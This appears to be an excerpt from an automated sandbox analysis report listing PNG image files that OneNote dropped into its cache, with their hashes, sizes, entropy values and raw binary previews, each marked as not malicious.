                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001G.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001H.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001I.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001J.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001K.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2210
                                                                                                                                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001L.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001M.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001N.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001O.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001P.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001Q.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000001R.bin (copy)

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
